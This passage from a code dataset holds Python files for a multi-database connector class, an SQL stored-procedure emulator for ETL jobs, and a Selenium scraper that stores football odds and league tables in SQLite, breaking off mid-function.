else:
return False
shutil.rmtree(path)
return True
class SaveTest(unittest.TestCase):
def test_save(self):
self.assertEqual(save(), True)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jinwzhang/running-procedure",
"score": 2
} |
#### File: running-procedure/PyProcedure/DB_Buddy.py
```python
import cx_Oracle
import pyodbc
import pymysql
import pandas as pd
import re
import sys
if sys.platform == 'linux':
from pyhive import hive
'''
<<<DB_Buddy v1.2>>>
功能:
v1.0 20200402 作为python连接数仓的集成基础类使用, 在一个类提供ORACLE, MYSQL, SQLSERVER的直连操作。
v1.1 20200813 追加记录 SQL%ROWCOUNT 功能
v1.2 20200824 支持连接hive
并能将产生的查询转换成pandas.Dataframe,提供自带的context manager功能,方便with操作
作者: zhangjinwei
path: /etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/python_app
'''
def find_row_affect(logs: list):
"""正则函数, 目的是从大量的日志中找到 写入的行数信息"""
pattern = re.compile(r'(HDFS Write: )(\d*)')
search_record = [pattern.search(str(log)) for log in logs]
for searched in search_record:
if searched:
return searched.group(2)
return 0
class DatabaseBuddy(object):
# 实例化入参: 1数据库类型 2用户名 3密码 4数据库IP 5端口号
def __init__(self, DB_type, db_username, db_pwd, db_IP, db_port, **kwargs):
self.DB_type = str(DB_type).upper()
self._support_db = ['ORACLE', 'MYSQL', 'MSSQL', 'SQLSERVER', 'HIVE']
assert self.DB_type in self._support_db, '数据库类型不支持, 目前支持%s' % str(self._support_db)
self.db_username = db_username
self._db_pwd = <PASSWORD>
self.db_IP = db_IP
self.db_port = db_port
self.other = kwargs
self.parallel = kwargs.get('option', False)
def __enter__(self):
if self.DB_type == 'ORACLE':
connection = cx_Oracle.connect(self.db_username, self._db_pwd, self.db_IP + ':' + self.db_port,
encoding="UTF-8")
elif self.DB_type == 'MYSQL':
connection = pymysql.connect(user=self.db_username, password=self._db_pwd, host=self.db_IP,
port=int(self.db_port), charset="utf8")
elif self.DB_type == 'MSSQL':
connection = pyodbc.connect('DRIVER={ODBC Driver 17 for SQL Server};server=%s;UID=%s;PWD=%s' % (
self.db_IP + ',' + self.db_port, self.db_username, self._db_pwd))
connection.add_output_converter(-150, self.handle_sql_variant_as_string) # mssql部分返回值数据类型需转换后才能fetch
elif self.DB_type == 'HIVE':
connection = hive.Connection(host=self.db_IP, port=self.db_port, username=self.db_username)
self.connections = connection
cursor = connection.cursor()
self.curr = cursor
if self.DB_type == 'ORACLE' and int(self.parallel) in range(1, 20):
self.excute_one('alter session enable parallel DML')
self.excute_one('alter session force parallel query parallel %d' % self.parallel)
self.excute_one('alter session force parallel dml parallel %d' % self.parallel)
print('set oracle session with paralle %d' % self.parallel)
return self
def __repr__(self):
return "<%s %s %s>" % (self.db_IP, self.db_port, self.db_username)
def __exit__(self, exc_ty, exc_val, tb):
self.connections.close()
def handle_sql_variant_as_string(self, value):
return value.decode('utf-16le')
def fetch(self, limit=50000, printf=True) -> tuple:
data = self.curr.fetchmany(limit)
if printf:
print(data)
return data
def excute_one(self, sql, commit=False, printf=False):
"""执行单条sql"""
row_affect = self.curr.execute(sql) # 适用于pymysql直接返回影响行数
if printf:
self.fetch()
if commit:
self.curr.execute('commit')
if self.DB_type == 'ORACLE':
row_affect = self.curr.rowcount
elif self.DB_type == 'HIVE':
log = self.fetch_logs()
row_affect = find_row_affect(log)
return row_affect
def excute_one_asyn(self):
"""异步执行"""
pass
def columns(self) -> list:
"""返回sql结果的表头"""
return [i[0] for i in self.curr.description]
def run_procedual(self, proc_name: str, *arg):
"""运行存储过程,存储过程名,[存储过程参数]"""
result_code = self.curr.var(int)
self.curr.callproc(proc_name, arg)
return result_code.getvalue()
def to_dataframe(self, *, row_num=0, header=True):
"""将SQL执行的结果放入到DataFrame当中并返回"""
assert row_num >= 0 and isinstance(row_num, int), \
'row_num err. (0 = get 50000 data, int > 1 is get row_num of data), input=<%s>' % str(row_num)
def instance_check(iterable1): # 这一步是为了适应SQL SERVER的返回,是一种自定义数据类型,不是元组
if isinstance(iterable1[-1], tuple):
return iterable1
else:
iterable1 = [tuple(i) for i in iterable1]
return iterable1
if row_num == 0:
data = self.fetch(printf=False)
assert data, 'No data returned!'
data = instance_check(list(data))
df = pd.DataFrame(list(data))
else:
data = self.fetch(row_num, printf=False)
assert data, 'No data returned!'
data = instance_check(list(data))
df = pd.DataFrame(data)
if header:
df.columns = self.columns()
return df
def fetch_logs(self):
"""新增读取hive日志"""
if self.DB_type == 'HIVE':
return self.curr.fetch_logs()
if __name__ == '__main__':
pass
```
#### File: running-procedure/PyProcedure/procedure_executor.py
```python
import sys
import datetime as dt
import json
import traceback
import pdb
from pandas import DataFrame
if sys.platform == 'linux':
import imp
sql_praser = imp.load_source('sql_praser', '/etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/pyProcedure/sbin/sql_praser.py')
sql_event_manager = imp.load_source('sql_event_manager', '/etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/pyProcedure/sbin/sql_event_manager.py')
config = imp.load_source('config','/etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/pyProcedure/conf/config.py')
DB_Buddy = imp.load_source('DB_Buddy', '/etl_home/app/ETL_HOME/ETL_SERVER/BIN/script/python_app/sbin/DB_Buddy.py')
import sql_praser
import sql_event_manager
import config
import DB_Buddy
else:
import sql_praser
import sql_event_manager
import config
from database import DB_Buddy
"""
SQL模拟存储过程执行器,通过向对应数据库发送sql指令实现类似oracle中的存储过程模拟。并记录日志。
Author: Zhangjinwei
Date: 20200819
Version: v1.0
"""
def json_update(json_old, new_dic):
"""将字典的值更新到json串中"""
if len(json_old) > 8 and isinstance(new_dic, dict):
json_dic = json.loads(json_old, encoding='utf-8')
json_dic.update(new_dic)
json_new = json.dumps(json_dic, ensure_ascii=False)
return json_new
else:
return json_old
def exception_handel(e):
"""错误捕捉"""
print('程序报错:', e,dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
traceback.print_exc() # 打印异常信息
exc_type, exc_value, exc_traceback = sys.exc_info()
return_msg = str(repr(traceback.format_exception(exc_type, exc_value, exc_traceback)))[:800]
return return_msg
def seconds_to_hms(seconds: int) -> str:
"""时间格式转换"""
hour, minute, second = seconds // 3600, seconds % 3600 // 60, seconds % 60
strf_time = dt.datetime(2020, 1, 1, int(hour), int(minute), int(second)).strftime('%H:%M:%S')
return strf_time
def re_run(log: DataFrame, option):
warn_msg = """开始断点重跑>>>
重跑逻辑:
!!!前提是已跑的后面的步骤不会影响之前步骤的数据:如表格重用,或删除了中间表的数据,则必须全部重跑,否则数据错误。
1 如原脚本没有改动,那么从原断点处开始重跑
2 原脚本有改变,那么从第一个修改处开始重跑
"""
if isinstance(log, DataFrame):
status_code = log.loc['step_status'].to_list()
def excutor(db, exec_plan_cls, log_manager):
"""存储过程执行主函数"""
dynamic_pool = {}
exec_sign = 1
log_df = log_manager.get_job_record() # 获取本作业本日的最近一次执行记录
return_code = 0
with db:
exec_plan_df = exec_plan_cls.excute_plan # 生成分步执行计划
exec_plan_df1 = exec_plan_df.copy(deep=True)
exec_plan_df1.fillna(' ', inplace=True)
for index, plan in exec_plan_df1.iterrows():
start_time = dt.datetime.now()
return_msg = ''
sql_all = sql_praser.remove_quote(str(plan['sql_all']), all_quote=True) # 移除注释
sql = sql_all.strip() if sql_all else ' '
infer, variable_pool = str(plan['infer']), str(plan['variable_pool'])
variable_pool = json_update(variable_pool, dynamic_pool) if len(variable_pool) > 5 else '' # 将动态执行得到的新变量更新进去
if infer.startswith('execute_') and exec_sign:
# 程序执行模块
return_msg = '执行成功'
affected_rows = 0
try:
exec_sql = exec_plan_cls.sql_add_variables(sql, variable_pool) if len(variable_pool) > 5 else sql
affected_rows = db.excute_one(exec_sql)
except Exception as e:
return_msg = exception_handel(e)
exec_plan_df1.at[index, 'deal_row'] = affected_rows
exec_plan_df1.at[index, 'exec_sign'] = 1
sql = exec_sql
elif infer == 'select_into' and exec_sign:
# select into变量动态赋值模块
try:
select_sql, variable_list = exec_plan_cls.select_into_praser(sql) # 根据语句拆成2部分, 1是要查询的语句, 2是要赋值的变量名
select_sql = exec_plan_cls.sql_add_variables(select_sql, variable_pool) # 先替换入已知变量
db.excute_one(select_sql) # 执行查询语句
var_df = db.to_dataframe(row_num=1) # 获取查询结果
variable_value = var_df.values.tolist()[0]
assert len(variable_list) == len(variable_value), '变量数不一致,程序报错 variable_list:%s variable_value:%s' % (str(variable_list), str(variable_value))
variable_pool_dic = json.loads(variable_pool, encoding='utf-8')
variable_dic = {}
for key1, val1 in zip(variable_list, variable_value):
variable_dic.update({key1: val1})
variable_pool_dic.update(variable_dic) # 1更新变量值
exec_plan_df1.at[index, 'variable_infer'] = json.dumps(variable_dic, ensure_ascii=False) # 2
sql = select_sql
exec_plan_df1.at[index, 'exec_sign'] = 1
except Exception as e:
return_msg = exception_handel(e)
elif infer.startswith('if_'):
# if else功能主模块
criteria = ' '
if infer == 'if_then':
bool_value, criteria = exec_plan_cls.if_clause_praser(sql, variable_pool)
exec_sign = bool_value
elif infer == 'if_elsif_then' and not exec_sign:
bool_value, criteria = exec_plan_cls.if_clause_praser(sql, variable_pool)
exec_sign = bool_value
elif infer == 'if_else' and not exec_sign:
exec_sign = 1
elif infer == 'if_end':
exec_sign = 1
exec_plan_df1.at[index, 'exec_sign'] = exec_sign
exec_plan_df1.at[index, 'if_bool_check'] = criteria
end_time = dt.datetime.now()
exec_time = (end_time - start_time).seconds
exec_time = seconds_to_hms(exec_time)
exec_plan_df1.at[index, 'start_time'] = start_time.strftime('%Y-%m-%d %H:%M:%S')
exec_plan_df1.at[index, 'return_msg'] = return_msg
exec_plan_df1.at[index, 'end_time'] = end_time.strftime('%Y-%m-%d %H:%M:%S')
exec_plan_df1.at[index, 'spend_time'] = exec_time
if sql:
sql = sql.replace('\'', '`').replace('\"', '``').replace('\n', 'char(10)')
exec_plan_df1.at[index, 'sql_short'] = sql[:100]
exec_plan_df1.at[index, 'sql_send'] = sql[:800]
if infer.startswith('execute_') or infer.startswith('if_') or infer in ('variable_setting', 'select_into'):
# 记录简版日志到数仓
log_manager.record(exec_plan_df1.iloc[[index]])
if return_msg not in ('', '执行成功') and plan['exception_handle'] != 'ignore':
# 错误中断检查
print('运行停止, 错误信息 ', return_msg, '>>>%s' % plan['sql_send'], sql)
exec_plan_df1.at[index, 'step_status'] = 'ERROR'
exec_plan_df1['variable_pool'].apply(lambda x: json_update(x, dynamic_pool)) # 出错后保留变量状态
# exec_plan_df1.drop(columns=['sql_all'], inplace=True)
log_manager.record_detail(exec_plan_df1)
return_code = 1
break
log_manager.record_detail(exec_plan_df1) # 记录所有日志
# exec_plan_df1.to_excel(r'D:\DDL_BACKUP\text.xlsx')
return return_code
def run(tx_date, db_name, script_addr):
"""主调用函数"""
t0 = dt.datetime.now()
print('<< PyProcedure V1.0 >> by Zlaw\n')
print('%s 程序开始 ' % t0.strftime('%Y-%m-%d %H:%M:%S'), '\n批次日期: ', tx_date, '数仓名: ', db_name, '\n存储过程路径: ', script_addr)
DB_type, db_username, db_pwd, db_IP, db_port = config.ServerConfig(db_name).info() # 获取配置信息
db = DB_Buddy.DatabaseBuddy(DB_type, db_username, db_pwd, db_IP, db_port, option=16) # 连接数据库
exec_plan = sql_praser.FormattedSql(script_addr, tx_date, DB_type) # 制作执行计划
exec_plan.server = db_IP
event_manager = sql_event_manager.EventKeeper(DB_type, db_IP, exec_plan.job_name, tx_date) # 初始化日志记录器
return_code = excutor(db, exec_plan, event_manager) # 开始执行
t1 = dt.datetime.now()
totol_time = seconds_to_hms((t1 - t0).seconds)
print('%s 程序结束' % t1.strftime('%Y-%m-%d %H:%M:%S'), '返回代码: ', return_code, '总运行时间: ', totol_time)
assert return_code == 0, '程序运行错误'
if __name__ == '__main__':
if sys.platform == 'linux':
try:
v_tx_date = sys.argv[1]
db_name = sys.argv[2]
sql_script_path = sys.argv[3]
except:
print('参数填写错误')
raise ValueError('入参一:v_tx_date 如 20200819, 入参二:数据库名 如 edw hive等, 入参三:拟运行sql文本路径')
try:
other_option = sys.argv[4]
print('可选参数已设置为 %', other_option)
except:
other_option = None
run(v_tx_date, db_name, sql_script_path)
else:
script_path = r'D:\DDL_BACKUP\Oracle_DDL\ARPT\PROCEDURE\P_EXT_LOANINVOICE_EVENT_20200323_0956.sql'
run('20200827', 'edw', script_path)
``` |
{
"source": "Jinx876/BetterOdds",
"score": 3
} |
#### File: BetterOdds/BetterOdds/betterodds.py
```python
import sqlite3
from sqlite3 import Error
from urllib.request import pathname2url
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import numpy
from math import floor
import time
from shutil import copy2
import datetime
import os
# Initialize Selenium Driver
options = Options()
options.headless = True
driver = webdriver.Chrome(options=options)
driver.implicitly_wait(40)
def main_db_check():
"""Check for the existence of main database and rebuilds if non existent"""
# Check for and rebuild main.db
global main_cur
global main_conn
try:
print("Connecting to main database...")
maindburi = 'file:{}?mode=rw'.format(pathname2url('main.db'))
main_conn = sqlite3.connect(maindburi, uri=True)
main_cur = main_conn.cursor()
print("Connection to main.db successful")
except sqlite3.OperationalError:
try:
print("Connection to main.db unsuccessful. Attempting to rebuild database..")
main_conn = sqlite3.connect('main.db')
main_cur = main_conn.cursor()
print("Main database successfully rebuilt")
except Error as e:
print("Rebuild of main.db unsuccessful. Exiting Application. Please see error message below \n", e)
# def archive_db_check():
# """Check for the existence of archive database and rebuilds if non existent"""
#
# # Check for an rebuild archive.db
# global archive_cur
# global archive_conn
# try:
# print("Connecting to archive database...")
# archdburi = 'file:{}?mode=rw'.format(pathname2url('archive.db'))
# archive_conn = sqlite3.connect(archdburi, uri=True)
# archive_cur = archive_conn.cursor()
# print("Connection to archive.db successful \n")
# return archive_cur
#
# except sqlite3.OperationalError:
# try:
# print("Connection to archive.db unsuccessful. Attempting to rebuild database..")
# archive_conn = sqlite3.connect('archive.db')
# archive_cur = archive_conn.cursor()
# print("Archive database successfully rebuilt \n")
# return archive_cur
# except Error as e:
# print("Rebuild of archive.db unsuccessful. Exiting Application. Please see error message below \n", e)
def db_table_check():
"""Check for the existence of tables in databases and rebuilds them if non existent"""
leagues_create = '''CREATE TABLE IF NOT EXISTS `leagues` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`country_name` TEXT NOT NULL,
`league_name` TEXT NOT NULL UNIQUE,
`country_league_name` TEXT NOT NULL,
`league_url` TEXT NOT NULL,
`league_winperc` INTEGER,
`single_chnc_margin` INTEGER,
`double_chnc_margin` INTEGER,
`pos_weighting` REAL,
`team_name_weighting` REAL,
`form_weighting` REAL,
`gd_weighting` REAL,
`pos_winrate` INTEGER,
`team_name_winrate` INTEGER,
`form_winrate` INTEGER,
`gd_winrate` INTEGER
);'''
match_data_create = '''CREATE TABLE IF NOT EXISTS `match_data` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`match_datetime` TEXT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`home_team_name` TEXT,
`home_team_ID` TEXT,
`away_team_name` TEXT,
`away_team_ID` TEXT,
`home_win` REAL,
`away_win` REAL,
`home_draw` REAL,
`away_draw` REAL,
`match_url` TEXT
);'''
league_data_home_create = '''CREATE TABLE IF NOT EXISTS `league_data_home` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`home_position` INTEGER,
`home_total_clubs` INTEGER,
`home_team_name` TEXT,
`home_team_id` TEXT,
`home_matches_played` INTEGER,
`home_matches_won` INTEGER,
`home_matches_draw` INTEGER,
`home_matches_loss` INTEGER,
`home_goal_diff` INTEGER,
`home_team_form` INTEGER
);'''
league_data_away_create = '''CREATE TABLE IF NOT EXISTS `league_data_away` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`away_position` INTEGER,
`away_total_clubs` INTEGER,
`away_team_name` TEXT,
`away_team_id` TEXT,
`away_matches_played` INTEGER,
`away_matches_won` INTEGER,
`away_matches_draw` INTEGER,
`away_matches_loss` INTEGER,
`away_goal_diff` INTEGER,
`away_team_form` INTEGER
);'''
name_conversion_create = '''CREATE TABLE IF NOT EXISTS `name_conversion` (
`fid` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`uefa_team_name` TEXT,
`flashscore_team_name` TEXT
);'''
uefa_team_ranking_create = '''CREATE TABLE IF NOT EXISTS `uefa_team_ranking` (
`fid` INTEGER PRIMARY KEY AUTOINCREMENT,
`team_rank` INTEGER,
`team_name` TEXT,
`uefa_points` REAL
);'''
match_analysis_create = '''CREATE TABLE IF NOT EXISTS `match_analysis` (
`fid` INTEGER PRIMARY KEY AUTOINCREMENT,
`match_datetime` TEXT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`home_team_name` TEXT,
`home_team_id` TEXT,
`away_team_name` TEXT,
`away_team_ID` TEXT,
`home_win` REAL,
`home_draw` REAL,
`away_draw` REAL,
`away_win` REAL,
`home_position` INTEGER,
`away_position` INTEGER,
`total_clubs` INTEGER,
`home_matches_played` INTEGER,
`away_matches_played` INTEGER,
`home_matches_won` INTEGER,
`away_matches_won` INTEGER,
`home_matches_draw` INTEGER,
`away_matches_draw` INTEGER,
`home_matches_loss` INTEGER,
`away_matches_loss` INTEGER,
`home_goal_diff` INTEGER,
`away_goal_diff` INTEGER,
`home_team_form` INTEGER,
`away_team_form` INTEGER,
`home_team_name_rank` REAL,
`away_team_name_rank` REAL,
`home_position_rank` REAL,
`away_position_rank` REAL,
`home_form_rank` REAL,
`away_form_rank` REAL,
`home_gd_rank` REAL,
`away_gd_rank` REAL,
`home_points_total` REAL,
`away_points_total` REAL,
`rec_bet` TEXT,
`percentage_chance` INTEGER,
`percentage_rec` INTEGER,
`match_result` TEXT,
`bet_result` TEXT,
`TEST_rec_bet` TEXT,
`TEST_bet_result` TEXT,
`match_url` TEXT UNIQUE
);'''
archive_table_create = '''CREATE TABLE IF NOT EXISTS `match_archive` (
`fid` INTEGER PRIMARY KEY AUTOINCREMENT,
`match_datetime` TEXT,
`country_name` TEXT,
`league_name` TEXT,
`country_league_name` TEXT,
`home_team_name` TEXT,
`home_team_id` TEXT,
`away_team_name` TEXT,
`away_team_ID` TEXT,
`home_win` REAL,
`home_draw` REAL,
`away_draw` REAL,
`away_win` REAL,
`home_position` INTEGER,
`away_position` INTEGER,
`total_clubs` INTEGER,
`home_matches_played` INTEGER,
`away_matches_played` INTEGER,
`home_matches_won` INTEGER,
`away_matches_won` INTEGER,
`home_matches_draw` INTEGER,
`away_matches_draw` INTEGER,
`home_matches_loss` INTEGER,
`away_matches_loss` INTEGER,
`home_goal_diff` INTEGER,
`away_goal_diff` INTEGER,
`home_team_form` INTEGER,
`away_team_form` INTEGER,
`home_team_name_rank` REAL,
`away_team_name_rank` REAL,
`home_position_rank` REAL,
`away_position_rank` REAL,
`home_form_rank` REAL,
`away_form_rank` REAL,
`home_gd_rank` REAL,
`away_gd_rank` REAL,
`home_points_total` REAL,
`away_points_total` REAL,
`rec_bet` TEXT,
`percentage_chance` INTEGER,
`percentage_rec` INTEGER,
`match_result` TEXT,
`bet_result` TEXT,
`TEST_rec_bet` TEXT,
`TEST_bet_result` TEXT,
`match_url` TEXT UNIQUE,
`league_url` TEXT NOT NULL,
`league_winperc` INTEGER,
`single_chnc_margin` INTEGER,
`double_chnc_margin` INTEGER,
`pos_weighting` REAL,
`team_name_weighting` REAL,
`form_weighting` REAL,
`gd_weighting` REAL,
`pos_winrate` INTEGER,
`team_name_winrate` INTEGER,
`form_winrate` INTEGER,
`gd_winrate` INTEGER
);'''
main_cur.execute(match_data_create)
main_cur.execute(leagues_create)
main_cur.execute(league_data_home_create)
main_cur.execute(league_data_away_create)
main_cur.execute(name_conversion_create)
main_cur.execute(uefa_team_ranking_create)
main_cur.execute(match_analysis_create)
main_cur.execute(archive_table_create)
main_conn.commit()
# -----------------------------------Leagues-------------------------------------------------
def leagues_display():
"""Prints the leagues from database"""
main_cur.execute("SELECT fid, country_league_name, league_url FROM Leagues")
leagues_view = main_cur.fetchall()
if len(leagues_view) == 0:
print("There are no leagues stored at the moment. Try adding some leagues \n")
else:
print("League List:")
for fid, country_league_name, league_url in leagues_view:
print(fid, country_league_name, league_url)
print(" ")
def league_update_add():
"""Adds leagues to the league database"""
while True:
user_prompt = input("Please paste the league webpage link from flashscore.com here: ")
driver.get(user_prompt)
league_country = driver.find_element_by_xpath('//*[@id="mc"]/h2/a[2]').get_attribute('textContent')
league_name = driver.find_element_by_xpath('//*[@id="mc"]/h2/a[3]').get_attribute('textContent')
country_league_name = league_country + ' ' + league_name
try:
main_cur.execute("INSERT INTO Leagues (country_name, league_name, country_league_name, league_url) "
"VALUES (?, ?, ?, ?)",
(league_country, league_name, country_league_name, user_prompt.strip()))
main_conn.commit()
print(country_league_name, "was added to the database \n")
break
except sqlite3.IntegrityError:
print(" ")
print(country_league_name, "is already in the database. Please try adding another league. \n")
print(" ")
continue
def league_update_delete():
"""Deletes leagues from the league database"""
while True:
user_prompt = input("Please input the number next to the league you would like to delete: ")
main_cur.execute("SELECT country_league_name FROM leagues WHERE fid = ?", (user_prompt,))
league_title = main_cur.fetchall()
if len(league_title) > 0:
main_cur.execute("DELETE FROM leagues WHERE fid = ?", (user_prompt,))
main_conn.commit()
print(" ")
print(league_title, "has been deleted")
break
else:
print(" ")
print(user_prompt, "is not a valid database entry. Please try again. \n")
continue
def leagues_url_return():
"""Return League links from database"""
main_cur.execute("SELECT league_url FROM leagues")
leagues_url = main_cur.fetchall()
return leagues_url
def league_names_return():
"""Return league names from database"""
main_cur.execute("SELECT country_league_name FROM leagues")
league_names = main_cur.fetchall()
return league_names
# ------------------------------------Match Data--------------------------------------------
def match_data_delete():
"""Delete match data table"""
main_cur.execute("DELETE FROM match_data WHERE fid IS NOT NULL")
main_conn.commit()
def match_list_create(leagues_url):
"""Find upcoming matches"""
match_list = []
for league_url in leagues_url:
driver.get(league_url[0])
# find scheduled matches
scheduled_matches = driver.find_element_by_xpath(
'//*[@id="fs-summary-fixtures"]/table/tbody').find_elements_by_tag_name('tr')
for match in scheduled_matches:
smatch_id = match.get_attribute('id')
if len(smatch_id) > 0:
match_list.append(smatch_id[4:])
else:
continue
# find today's matches
try:
today_matches = driver.find_element_by_xpath('//*[@id="fs"]/div/table/tbody').find_elements_by_tag_name(
'tr')
for tmatch in today_matches:
tmatch_id = tmatch.get_attribute('id')
if len(tmatch_id) > 0:
match_list.append(tmatch_id[4:])
else:
continue
except:
continue
# driver.close()
return match_list
def match_info(match_list):
"""Gather match data"""
total_matches = len(match_list)
matches_scanned = 0
for match_id in match_list:
try:
match_url = 'https://www.flashscore.com/match/' + match_id + '/#match-summary'
driver.get(match_url)
match_status = driver.find_element_by_css_selector(
'#flashscore > div.team-primary-content > div.match-info > div.info-status.mstat').get_attribute(
'textContent')
if match_status == 'Finished' or match_status == 'Postponed' or match_status == 'Cancelled':
continue
match_datetime_raw = driver.find_element_by_xpath('//*[@id="utime"]').get_attribute('textContent')
match_datetime_split = match_datetime_raw.split(' ')
match_time = match_datetime_split[1] + ':00'
match_date = match_datetime_split[0].split('.')
match_datetime = match_date[2] + '-' + match_date[1] + '-' + match_date[0] + ' ' + match_time
match_country_name = str(driver.find_element_by_xpath(
'//*[@id="detcon"]/div[1]/div[2]/div[1]/div/div[1]/span[2]').get_attribute('textContent')
).split(':')[0].capitalize()
match_league_name = str(driver.find_element_by_xpath(
'//*[@id="detcon"]/div[1]/div[2]/div[1]/div/div[1]/span[2]/a').get_attribute(
'textContent')).split(' -')[0].strip()
country_league_name = match_country_name + ' ' + match_league_name
home_team_name = driver.find_element_by_xpath(
'//*[@id="flashscore"]/div[1]/div[1]/div[2]/div/div/a').get_attribute('textContent')
away_team_name = driver.find_element_by_xpath(
'//*[@id="flashscore"]/div[1]/div[3]/div[2]/div/div/a').get_attribute('textContent')
home_team_id = driver.find_element_by_xpath(
'//*[@id="flashscore"]/div[1]/div[1]/div[1]/div/a').get_attribute(
'onclick')[-25:-17]
away_team_id = driver.find_element_by_xpath(
'//*[@id="flashscore"]/div[1]/div[3]/div[1]/div/a').get_attribute(
'onclick')[-25:-17]
home_win_odds = driver.find_element_by_xpath(
'//*[@id="default-odds"]/tbody/tr/td[2]/span/span[2]/span').get_attribute('textContent')
if home_win_odds == '-':
home_win_odds = 0.00
away_win_odds = driver.find_element_by_xpath(
'//*[@id="default-odds"]/tbody/tr/td[4]/span/span[2]/span').get_attribute('textContent')
if away_win_odds == '-':
away_win_odds = 0.00
dc_odds_url = 'https://www.flashscore.com/match/' + match_id + '/#odds-comparison;double-chance;full-time'
driver.get(dc_odds_url)
home_draw_odds = driver.find_element_by_xpath('//*[@id="odds_dch"]/tbody/tr[1]/td[2]/span').get_attribute(
'textContent')
if home_draw_odds == '-':
home_draw_odds = 0.00
away_draw_odds = driver.find_element_by_xpath('//*[@id="odds_dch"]/tbody/tr[1]/td[4]/span').get_attribute(
'textContent')
if away_draw_odds == '-':
away_draw_odds = 0.00
main_cur.execute('''INSERT INTO match_data(match_datetime, country_name, league_name, country_league_name,
home_team_name, home_team_ID, away_team_name, away_team_ID, home_win, away_win, home_draw, away_draw,
match_url)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)''',
(match_datetime, match_country_name, match_league_name, country_league_name,
home_team_name, home_team_id, away_team_name, away_team_id, home_win_odds, away_win_odds,
home_draw_odds, away_draw_odds, match_url))
main_conn.commit()
matches_scanned += 1
print("Scanning match", matches_scanned, "of", total_matches, "|", home_team_name, "vs", away_team_name)
# driver.close()
except:
matches_scanned += 1
print("Skipped match", matches_scanned, "of", total_matches, "|", match_url)
continue
# ------------------------------------League Scrape-----------------------------------------
def league_table_delete():
"""Delete data in the home and away league tables"""
main_cur.execute("DELETE FROM league_data_home")
main_cur.execute("DELETE FROM league_data_away")
main_conn.commit()
def league_data_home(leagues_url):
"""Retrieve home league data for listed leagues"""
leagues_scanned = 0
total_leagues = len(leagues_url)
for league_url in leagues_url:
driver.get(str(league_url[0]))
try:
driver.find_element_by_xpath('//*[@id="tabitem-table-home"]/span/a').click()
tablerow = driver.find_element_by_xpath('//*[@id="table-type-1"]/tbody').find_elements_by_tag_name('tr')
except:
driver.find_element_by_xpath('//*[@id="tabitem-table"]/span/a').click()
driver.find_element_by_xpath('//*[@id="tabitem-table-home"]/span/a').click()
tablerow = driver.find_element_by_xpath('//*[@id="table-type-2"]/tbody').find_elements_by_tag_name('tr')
counter = 1
for row in tablerow:
country_name = driver.find_element_by_xpath('//*[@id="mc"]/h2/a[2]').get_attribute('textContent')
league_name = driver.find_element_by_xpath('//*[@id="fscon"]/div[1]/div[2]').get_attribute('textContent')
country_league_name = country_name + ' ' + league_name
home_position = counter
home_total_clubs = len(tablerow)
home_team_name = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[2]/span[2]/a').get_attribute('textContent')
home_team_id = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[2]/span[2]/a').get_attribute('onclick')[
-12:-4]
home_matches_played = int(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[3]').get_attribute(
'textContent'))
home_matches_won = int(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[4]').get_attribute(
'textContent'))
home_matches_draw = int(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[5]').get_attribute(
'textContent'))
home_matches_loss = int(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[6]').get_attribute(
'textContent'))
goal_fa = str(
row.find_element_by_xpath('//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[7]').get_attribute(
'textContent')).split(':')
home_goal_diff = int(goal_fa[0]) - int(goal_fa[1])
form_list = []
home_team_form = 0
try:
form_game1 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[2]').get_attribute('class')[13]
form_list.append(form_game1)
form_game2 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[3]').get_attribute('class')[13]
form_list.append(form_game2)
form_game3 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[4]').get_attribute('class')[13]
form_list.append(form_game3)
form_game4 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[5]').get_attribute('class')[13]
form_list.append(form_game4)
form_game5 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[6]').get_attribute('class')[26]
form_list.append(form_game5)
except:
form_game1 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[1]').get_attribute('class')[13]
form_list.append(form_game1)
form_game2 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[2]').get_attribute('class')[13]
form_list.append(form_game2)
form_game3 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[3]').get_attribute('class')[13]
form_list.append(form_game3)
form_game4 = row.find_element_by_xpath(
'//*[@id="table-type-2"]/tbody/tr[' + str(counter) + ']/td[9]/div/a[4]').get_attribute('class')[13]
form_list.append(form_game4)
form_game5 = row.find_element_by_xpath(
